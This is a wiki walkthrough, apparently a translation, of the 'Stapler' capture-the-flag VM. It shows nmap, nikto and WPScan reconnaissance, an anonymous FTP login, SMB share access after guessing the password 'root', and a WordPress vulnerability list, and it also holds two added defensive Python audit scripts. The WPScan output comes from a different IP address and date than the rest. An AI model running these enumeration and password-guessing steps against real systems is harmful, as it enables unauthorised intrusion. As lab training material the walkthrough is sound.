Difference between revisions of "CTF Stapler: Walkthrough"

From OnnoWiki
Revision as of 15:04, 23 January 2023

Description

+---------------------------------------------------------+
|                                                         |
|                                  __..--\              |
|                          __..--         \             |
|                  __..--          __..--             |
|          __..--          __..--       |             |
|          \ o        __..--____....----""              |
|           \__..--\                                    |
|           |         \                                   |
|          +----------------------------------+           |
|          +----------------------------------+           |
|                                                         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|   Name: Stapler           |          IP: DHCP           |
|   Date: 2016-June-08      |        Goal: Get Root!      |
| Author: g0tmi1k           | Difficultly: ??? ;)         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|                                                         |
| + Average beginner/intermediate VM, only a few twists   |
|   + May find it easy/hard (depends on YOUR background)  |
|   + ...also which way you attack the box                |
|                                                         |
| + It SHOULD work on both VMware and Virtualbox          |
|   + REBOOT the VM if you CHANGE network modes           |
|   + Fusion users, you'll need to retry when importing   |
|                                                         |
| + There are multiple methods to-do this machine         |
|   + At least two (2) paths to get a limited shell       |
|   + At least three (3) ways to get a root access        |
|                                                         |
| + Made for BsidesLondon 2016                            |
|   + Slides: https://download.vulnhub.com/media/stapler/ |
|                                                         |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman  |
|   + ...and shout-outs to the VulnHub-CTF Team =)        |
|                                                         |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
|                                                         |
|       --~~Enjoy. Have fun. Happy Hacking.~~--       |
|                                                         |
+---------------------------------------------------------+

Installation

  • Download the OVA
  • Install it in VirtualBox
  • Run it

Hack

netdiscover

Find the IP address of the Stapler server:

netdiscover -r 192.168.0.0/24

The result:

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                                   
                                                                                                                                                                                                                                 
 29 Captured ARP Req/Rep packets, from 21 hosts.   Total size: 1740                                                                                                                                                              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.0.2     40:16:7e:22:e7:69      1      60  ASUSTek COMPUTER INC.                                                                                                                                                         
 192.168.0.4     10:6f:3f:3d:73:d0      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.7     4c:e6:76:1f:15:4b      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.9     10:6f:3f:17:94:94      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.7     4c:e6:76:1f:15:4c      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.61    08:00:27:8b:94:43      1      60  PCS Systemtechnik GmbH                                                                                                                                                        
 192.168.0.60    74:d0:2b:6a:a9:66      1      60  ASUSTek COMPUTER INC.                                                                                                                                                         
 192.168.0.101   08:60:6e:db:4e:b8      1      60  ASUSTek COMPUTER INC.                                                                                                                                                         
 192.168.0.141   b0:a7:b9:b6:c1:c9      3     180  TP-Link Corporation Limited                                                                                                                                                   
 192.168.0.102   6c:29:90:1e:89:7f      1      60  WiZ Connected Lighting Company Limited                                                                                                                                        
 192.168.0.145   c0:56:27:1c:be:e1      1      60  Belkin International Inc.                                                                                                                                                     
 192.168.0.169   4c:e6:76:1f:15:4b      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.170   4c:e6:76:1f:15:4b      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.169   4c:e6:76:1f:15:4c      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.170   4c:e6:76:1f:15:4c      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.199   b4:b0:24:3d:8b:3b      1      60  TP-Link Corporation Limited                                                                                                                                                   
 192.168.0.223   c0:56:27:67:0d:a3      1      60  Belkin International Inc.                                                                                                                                                     
 192.168.0.224   28:ff:3e:5c:10:32      4     240  zte corporation                                                                                                                                                               
 192.168.0.222   6c:16:32:63:52:21      4     240  HUAWEI TECHNOLOGIES CO.,LTD                                                                                                                                                   
 192.168.0.144   6e:65:e5:8a:25:0d      1      60  Unknown vendor                                                                                                                                                                
 0.0.0.0         b0:a7:b9:b6:c1:c9      1      60  TP-Link Corporation Limited 


A VirtualBox target usually has a MAC address starting with 08:00:... The target IP address here is

 192.168.0.61    08:00:27:8b:94:43      1      60  PCS Systemtechnik GmbH 


Port Scanning

Port scanning

nmap -sS -A -O -n -p1-60000 192.168.0.61
nmap -v -A 192.168.0.61

The result looks roughly like this:

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 01:11 EST
Initiating SYN Stealth Scan at 01:11
Scanning 192.168.0.61 [1000 ports]
Discovered open port 21/tcp on 192.168.0.61
Discovered open port 139/tcp on 192.168.0.61
Discovered open port 3306/tcp on 192.168.0.61
Discovered open port 80/tcp on 192.168.0.61
Discovered open port 53/tcp on 192.168.0.61
Discovered open port 22/tcp on 192.168.0.61
Discovered open port 666/tcp on 192.168.0.61
Scanning 7 services on 192.168.0.61
Nmap scan report for 192.168.0.61
Host is up (0.00066s latency).
Not shown: 992 filtered tcp ports (no-response)
PORT     STATE  SERVICE     VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp         vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.0.62
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp   open   domain      dnsmasq 2.75
| dns-nsid: 
|   NSID: 218m83 (3231386d3833)
|   id.server: CGK
|_  bind.version: dnsmasq-2.75
80/tcp   open   http        PHP cli server 5.5 or later
|_http-title: 404 Not Found
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
139/tcp  open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp  open   doom?
| fingerprint-strings: 
|   NULL: 
|     message2.jpgUT 
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 10
|   Capabilities flags: 63487
|   Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, FoundRows, 
SupportsLoadDataLocal, InteractiveClient, SupportsTransactions, IgnoreSigpipes, 
Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, 
LongPassword, ODBCClient, ConnectWithDatabase, SupportsCompression, SupportsAuthPlugins, 
SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: <Xp\x1EH]w*\x1C"+\x14\x19\x16*\x15ZnR\x1D
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:8B:94:43 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.005 days (since Mon Jan 23 01:04:14 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel  

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m58s
| smb2-time: 
|   date: 2023-01-23T13:11:23
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   RED<00>              Flags: <unique><active>
|   RED<03>              Flags: <unique><active>
|   RED<20>              Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2023-01-23T13:11:23+00:00 

TRACEROUTE
HOP RTT     ADDRESS
1   0.66 ms 192.168.0.61

OS and Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.02 seconds
           Raw packets sent: 2024 (90.564KB) | Rcvd: 24 (1.428KB)

One interesting finding here is FTP, which allows anonymous login.

Anonymous FTP

Try an anonymous FTP login (username anonymous, any password):

ftp 192.168.0.61 
Connected to 192.168.0.61.
220-
220-|----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|----------------------------------------------------------------------------------------|
220-
220 
Name (192.168.0.61:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Nice! Check which files are on the FTP server and grab whatever is there :) ..

ftp> ls
550 Permission denied.
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
100% 
|*************************************************************************************************************************************************************************************|   
107        0.91 KiB/s    00:00 ETA
226 Transfer complete.
107 bytes received in 00:00 (0.91 KiB/s)
ftp> quit
221 Goodbye.

Open the note:

cat note                     

Its contents:

Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
         

Nothing too interesting, but there are two (2) names :) ... they may help later if we need to brute force.
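The anonymous login above, and the "plain text" control connection in the nmap ftp-syst output, come straight from vsftpd's configuration. As an added example (not code from this walkthrough), the script below parses a vsftpd.conf and flags those settings, then emits a hardened copy. SAMPLE_CONF is constructed: the real vsftpd.conf that the walkthrough later pulls from the backup share is not printed on the page.

```python
"""Audit vsftpd.conf for the settings behind "Anonymous FTP login allowed".

Added example, not part of the original walkthrough. SAMPLE_CONF is a
constructed file with the kind of settings that match the nmap ftp-syst and
ftp-anon output (anonymous login accepted, plain-text control connection).
"""
from __future__ import annotations

SAMPLE_CONF = """\
# /etc/vsftpd.conf (constructed sample, not the file from the CTF box)
listen=YES
anonymous_enable=YES
local_enable=YES
#write_enable=YES
anon_upload_enable=YES
dirmessage_enable=YES
ftpd_banner=Harry, make sure to update the banner when you get a chance
ssl_enable=NO
chroot_local_user=NO
"""

# Real vsftpd option names: (value that is risky, why it matters).
RISKY = {
    "anonymous_enable": ("YES", "anonymous logins are accepted"),
    "anon_upload_enable": ("YES", "anonymous users may upload files"),
    "anon_mkdir_write_enable": ("YES", "anonymous users may create directories"),
    "anon_other_write_enable": ("YES", "anonymous users may delete or rename"),
    "ssl_enable": ("NO", "credentials and data cross the wire in plain text"),
    "chroot_local_user": ("NO", "local users can browse outside their home"),
}

# vsftpd's compiled-in defaults (man vsftpd.conf), so unset options are
# judged too: anonymous_enable defaults to YES unless the file says otherwise.
DEFAULTS = {
    "anonymous_enable": "YES",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "anon_other_write_enable": "NO",
    "ssl_enable": "NO",
    "chroot_local_user": "NO",
}


def parse_vsftpd_conf(text: str) -> dict[str, str]:
    """Parse vsftpd.conf: one option=value per line, '#' lines are comments.

    vsftpd itself rejects whitespace around '='; stripping it here only makes
    the audit tolerant of hand-edited copies.
    """
    options: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            options[key.strip()] = value.strip()
    return options


def audit_vsftpd(options: dict[str, str]) -> list[str]:
    """One finding per risky option, noting whether it was set or defaulted."""
    findings: list[str] = []
    for opt, (risky, why) in RISKY.items():
        value = options.get(opt, DEFAULTS[opt]).upper()
        origin = "set" if opt in options else "default"
        if value == risky:
            findings.append(f"{opt}={value} ({origin}): {why}")
    return findings


def harden_vsftpd(options: dict[str, str]) -> dict[str, str]:
    """Return a copy with every RISKY option flipped to its safe value.

    ssl_enable=YES also needs rsa_cert_file/rsa_private_key_file pointing at a
    real certificate, which is outside what this example can supply.
    """
    fixed = dict(options)
    for opt, (risky, _) in RISKY.items():
        fixed[opt] = "NO" if risky == "YES" else "YES"
    return fixed


def render_vsftpd(options: dict[str, str]) -> str:
    """Serialise back to vsftpd's strict option=value form."""
    return "".join(f"{k}={v}\n" for k, v in options.items())


if __name__ == "__main__":
    opts = parse_vsftpd_conf(SAMPLE_CONF)
    for finding in audit_vsftpd(opts):
        print("[!]", finding)
    print("--- hardened ---")
    print(render_vsftpd(harden_vsftpd(opts)), end="")
```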

Try SSH as root

Try to connect:

ssh root@192.168.0.61                                                                                                  

It fails:

The authenticity of host '192.168.0.61 (192.168.0.61)' can't be established.
ED25519 key fingerprint is SHA256:eKqLSFHjJECXJ3AvqDaqSI9kP+EbRmhDaNZGyOrlZ2A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.61' (ED25519) to the list of known hosts.
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
root@192.168.0.61's password: 
Permission denied, please try again.


But we get one more name :) ..

Try SMB

Try:

smbclient -L 192.168.0.61

Password for [WORKGROUP\root]:

Try entering root as the password. By luck it works :) .. The result is roughly:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        kathy           Disk      Fred, What are we doing here?
        tmp             Disk      All temporary files should be stored here
        IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------  

        Workgroup            Master
        ---------            -------
        WORKGROUP            SCANDISK


There appear to be 2 active shares: kathy and tmp. The interesting part is the comment: Fred, What are we doing here? It seems Fred can access the kathy share. Let's access the kathy share using the networked user/computer fred.

smbclient //fred/kathy -I 192.168.0.61 -N

Try ls:

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  3 12:52:52 2016
  ..                                  D        0  Mon Jun  6 17:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 11:02:27 2016
  backup                              D        0  Sun Jun  5 11:04:14 2016

                19478204 blocks of size 1024. 16397108 blocks available
smb: \> 

Nice! It seems we can connect. Enumerate the files and folders.

smb: \> cd kathy_stuff\
smb: \kathy_stuff\> ls
  .                                   D        0  Sun Jun  5 11:02:27 2016
  ..                                  D        0  Fri Jun  3 12:52:52 2016
  todo-list.txt                       N       64  Sun Jun  5 11:02:27 2016

                19478204 blocks of size 1024. 16397108 blocks available
smb: \kathy_stuff\> get todo-list.txt 
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (3.3 KiloBytes/sec) 
(average 3.3 KiloBytes/sec)
smb: \kathy_stuff\> cd ..
smb: \> cd backup\
smb: \backup\> ls
  .                                   D        0  Sun Jun  5 11:04:14 2016
  ..                                  D        0  Fri Jun  3 12:52:52 2016
  vsftpd.conf                         N     5961  Sun Jun  5 11:03:45 2016
  wordpress-4.tar.gz                  N  6321767  Mon Apr 27 13:14:46 2015 
                19478204 blocks of size 1024. 16397108 blocks available
smb: \backup\> get vsftpd.conf 
getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (306.4 KiloBytes/sec) (average 154.8 KiloBytes/sec)
smb: \backup\> quit


After finishing with the kathy share, we can do the same for the tmp share:

smbclient //fred/tmp -I 192.168.0.61 -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jun  7 04:08:39 2016
  ..                                  D        0  Mon Jun  6 17:39:56 2016
  ls                                  N      274  Sun Jun  5 11:32:58 2016

                19478204 blocks of size 1024. 16397096 blocks available
smb: \> quit

Nothing looks interesting, but at least we got the FTP configuration file and the to-do list.

Let's take a look:

cat todo-list.txt 

Its contents:

I'm making sure to backup anything important for Initech, Kathy

Let's take a look:

cat ls            

Its contents:

.:
total 12.0K
drwxrwxrwt  2 root root 4.0K Jun  5 16:32 .
drwxr-xr-x 16 root root 4.0K Jun  3 22:06 ..
-rw-r--r--  1 root root    0 Jun  5 16:32 ls
drwx------  3 root root 4.0K Jun  5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ


Nikto 12380

Check the web server:

nikto -h 192.168.0.61:12380

The result:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.61
+ Target Hostname:    192.168.0.61
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are 
you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put 
here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are 
you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put 
here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2023-01-23 01:55:17 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to 
protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render 
the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 
is the EOL for the 2.x branch.
+ Hostname '192.168.0.61' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2023-01-23 01:59:01 (GMT-5) (224 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


Interestingly, we get 4 paths: /phpmyadmin/, /blogblog/, /admin112233/, and of course /robots.txt.
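Nikto's header findings above can be re-checked without the tool. As an added example (not code from this walkthrough), the script below parses a raw HTTP response and flags the same weaknesses; WEAK_RESPONSE is constructed from the headers the page reports (Server, dave, x-ob_mode) with the rest made up, and HARDENED_RESPONSE shows the corrected header set beside it.

```python
"""Re-check the header findings nikto reported for 192.168.0.61:12380.

Added example, not from the original walkthrough. The raw responses below
are constructed; only the Server, dave and x-ob_mode values come from the
page's nikto and WPScan output.
"""
from __future__ import annotations

import re

WEAK_RESPONSE = """\
HTTP/1.1 200 OK
Date: Mon, 23 Jan 2023 06:55:17 GMT
Server: Apache/2.4.18 (Ubuntu)
dave: Soemthing doesn't look right here
x-ob_mode: 1
Content-Type: text/html; charset=UTF-8
Content-Length: 1234
"""

HARDENED_RESPONSE = """\
HTTP/1.1 200 OK
Date: Mon, 23 Jan 2023 06:55:17 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 1234
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src 'self'; frame-ancestors 'self'
"""

# Headers an ordinary Apache/WordPress response may carry; anything else is
# reported the way nikto reports an "uncommon header".
KNOWN_HEADERS = {
    "date", "server", "content-type", "content-length", "connection",
    "keep-alive", "cache-control", "expires", "pragma", "vary", "etag",
    "last-modified", "set-cookie", "link", "x-powered-by", "x-pingback",
    "transfer-encoding", "content-encoding", "location",
    "x-frame-options", "x-content-type-options", "strict-transport-security",
    "content-security-policy", "referrer-policy", "x-xss-protection",
    "permissions-policy", "expect-ct",
}

HSTS_MIN_AGE = 15552000  # six months, the floor preload checkers use


def parse_response_headers(raw: str) -> dict[str, str]:
    """Parse the header block of an HTTP/1.1 response into a lower-cased dict.

    Repeated headers are folded with ", " as RFC 9110 allows for most fields.
    """
    lines = raw.splitlines()
    if not lines or not lines[0].startswith("HTTP/"):
        raise ValueError("not an HTTP response: missing status line")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, sep, value = line.partition(":")
        if not sep:
            continue  # tolerate junk lines instead of aborting the audit
        key = name.strip().lower()
        value = value.strip()
        headers[key] = f"{headers[key]}, {value}" if key in headers else value
    return headers


def audit_headers(headers: dict[str, str], https: bool = True) -> list[str]:
    """Return one finding per weakness, in a stable order; empty means clean."""
    findings: list[str] = []

    xfo = headers.get("x-frame-options", "").upper()
    csp = headers.get("content-security-policy", "")
    if xfo not in {"DENY", "SAMEORIGIN"} and "frame-ancestors" not in csp:
        findings.append("clickjacking: no X-Frame-Options DENY/SAMEORIGIN "
                        "and no CSP frame-ancestors")

    if headers.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("mime-sniffing: X-Content-Type-Options is not 'nosniff'")

    if https:  # HSTS only means something on a TLS origin such as :12380
        hsts = headers.get("strict-transport-security", "")
        m = re.search(r"max-age=(\d+)", hsts, re.IGNORECASE)
        if not m:
            findings.append("hsts: Strict-Transport-Security missing")
        elif int(m.group(1)) < HSTS_MIN_AGE:
            findings.append(f"hsts: max-age {m.group(1)} below {HSTS_MIN_AGE}")

    if not csp:
        findings.append("csp: Content-Security-Policy missing")

    server = headers.get("server", "")
    if re.search(r"\d+\.\d+", server):
        findings.append(f"disclosure: Server header reveals a version ({server})")

    for name in sorted(set(headers) - KNOWN_HEADERS):
        findings.append(f"uncommon header: {name}: {headers[name]}")

    return findings


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"== {label} ==")
        for finding in audit_headers(parse_response_headers(raw)) or ["clean"]:
            print(" -", finding)
```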

Web Access

Try accessing:

https://192.168.0.61:12380/robots.txt

Its contents:

User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/

Let's try

https://192.168.0.61:12380/admin112233/

It displays a "joke".

This could have been a BeEF-XSS hook ;)

Let's try

https://192.168.0.61:12380/blogblog/

It contains a blog; nothing too interesting apart from a few names. What is interesting is that there is a login page.

WPScan

Scan using:

wpscan --url https://192.168.0.61:12380/blogblog/ --enumerate

The result:

_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_| 

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.1
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________ 

[+] URL: https://192.168.1.13:12380/blogblog/
[+] Started: Tue Oct  4 20:09:24 2016 

[!] The WordPress 'https://192.168.1.13:12380/blogblog/readme.html' file exists exposing a version number
[+] Interesting header: DAVE: Soemthing doesn't look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)

[!] Registration is enabled: https://192.168.1.13:12380/blogblog/wp-login.php?action=register
[+] XML-RPC Interface available under: https://192.168.1.13:12380/blogblog/xmlrpc.php
[!] Upload directory has directory listing enabled: https://192.168.1.13:12380/blogblog/wp-content/uploads/
[!] Includes directory has directory listing enabled: https://192.168.1.13:12380/blogblog/wp-includes/

[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)
[!] 23 vulnerabilities identified from the version number

[!] Title: WordPress 4.1-4.2.1 - Genericons Cross-Site Scripting (XSS)

   Reference: https://wpvulndb.com/vulnerabilities/7979
   Reference: https://codex.wordpress.org/Version_4.2.2

[i] Fixed in: 4.2.2

[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)

   Reference: https://wpvulndb.com/vulnerabilities/8111
   Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
   Reference: https://twitter.com/klikkioy/status/624264122570526720
   Reference: https://klikki.fi/adv/wordpress3.html
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623

[i] Fixed in: 4.2.3

[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection

   Reference: https://wpvulndb.com/vulnerabilities/8126
   Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213

[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack

   Reference: https://wpvulndb.com/vulnerabilities/8130
   Reference: https://core.trac.wordpress.org/changeset/33536
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730

[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)

   Reference: https://wpvulndb.com/vulnerabilities/8131
   Reference: https://core.trac.wordpress.org/changeset/33529
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732

[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)

   Reference: https://wpvulndb.com/vulnerabilities/8132
   Reference: https://core.trac.wordpress.org/changeset/33541
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733

[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)

   Reference: https://wpvulndb.com/vulnerabilities/8133
   Reference: https://core.trac.wordpress.org/changeset/33549
   Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734

[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)

   Reference: https://wpvulndb.com/vulnerabilities/8186
   Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
   Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
   Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714

[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)

   Reference: https://wpvulndb.com/vulnerabilities/8187
   Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
   Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989

[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - Publish Post & Mark as Sticky Permission Issue

   Reference: https://wpvulndb.com/vulnerabilities/8188
   Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
   Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
   Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715

[i] Fixed in: 4.2.5

[!] Title: WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)

   Reference: https://wpvulndb.com/vulnerabilities/8358
   Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
   Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564

[i] Fixed in: 4.2.6

[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)

   Reference: https://wpvulndb.com/vulnerabilities/8376
   Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
   Reference: https://core.trac.wordpress.org/changeset/36435
   Reference: https://hackerone.com/reports/110801
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222

[i] Fixed in: 4.2.7

[!] Title: WordPress 3.7-4.4.1 - Open Redirect

   Reference: https://wpvulndb.com/vulnerabilities/8377
   Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
   Reference: https://core.trac.wordpress.org/changeset/36444
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221

[i] Fixed in: 4.2.7

